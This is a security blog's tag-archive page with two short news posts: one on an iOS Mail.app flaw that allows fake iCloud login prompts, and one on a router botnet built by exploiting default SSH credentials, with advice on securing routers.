Tag Archives: hijacking

Avira

Flaw in Mail.app Can Be Used to Hijack iCloud Password

Leave a comment

The flaw lies in the Mail.app, Apples default e-mail program for iOS. According to security researcher Jan Sourcek “this bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS.“ To reduce suspicion the code even detects if someone has already visited the page in the past by using cookies. If this was the case it stops displaying the password prompt.

This means that hackers could easily create phishing mails which show a form that looks exactly like the iCloud login pop-up window everyone knows. The user would be asked for their username and password, which – once entered – would then be transmitted to the cybercriminals.  Just take a look at the below concept-of-proof video to see how easy it would be to trick the unsuspecting user!

Sourcek discovered the flaw in January 2015 and informed Apple immediately. Since then no action has been taken in order to fix said vulnerability. In the hope that it will make Apple take the bug more seriously, the security researcher has now published his findings together with a proof-of-concept video and the corresponding code.

Feel free to follow this link in order to find out more about the issue.

The post Flaw in Mail.app Can Be Used to Hijack iCloud Password appeared first on Avira Blog.

Avira

Mass-Scale Abuse of Routers Due to Lax Security

Leave a comment

The reason why botnets like that can even exist? According to a study by Incapsula it’s simple negligence – by ISPs, vendors and users alike.

The attacks were first spotted last year in December and seem to be ongoing ever since. More than 40,000 infected routers from 1,600 ISPs all over the world have been documented. When not used to execute DDoS (distributed denial of service) attacks the routers do something rather scary: In their idle time they use their resources to scan for additional routers to recruit!

“Our analysis reveals that miscreants are using their botnet resources to scan for additional routers to add to their “flock.” They do so by executing shell scripts, searching for devices having open SSH ports which can be accessed using default credentials.

Facilitating the infiltration, all of these under-secured routers are clustered in the IP neighborhoods of specific ISPs, which provide them in bulk to end users. For perpetrators, this is like shooting fish in a barrel, which makes each of the scans that much more effective. Using this botnet also enables perpetrators to execute distributed scans, improving their chances against commonplace blacklisting, rate-limiting and reputation-based defense mechanisms”, the study says.

The researchers believe that the routers were not hacked by means of vulnerabilities in the firmware but were hijacked due to other issues: all units are remotely accessible via HTTP and SSH on their default ports and nearly all of them are configured with vendor-provided default login credentials.

This combination invites trouble and DDoS attacks are only one of the possible threats resulting from it. Attackers could just as well:

  • eavesdrop on all communication.
  • perform man-in-the-middle (MITM) attacks (e.g., DNS poisoning).
  • hijack cookies.
  • gain access to local network devices (e.g., CCTV cameras).

What can you do?

Make sure to always change the default login credentials. That’s something every router owner should do from the start. You should also think twice before enabling remote access to your router management interface.

The post Mass-Scale Abuse of Routers Due to Lax Security appeared first on Avira Blog.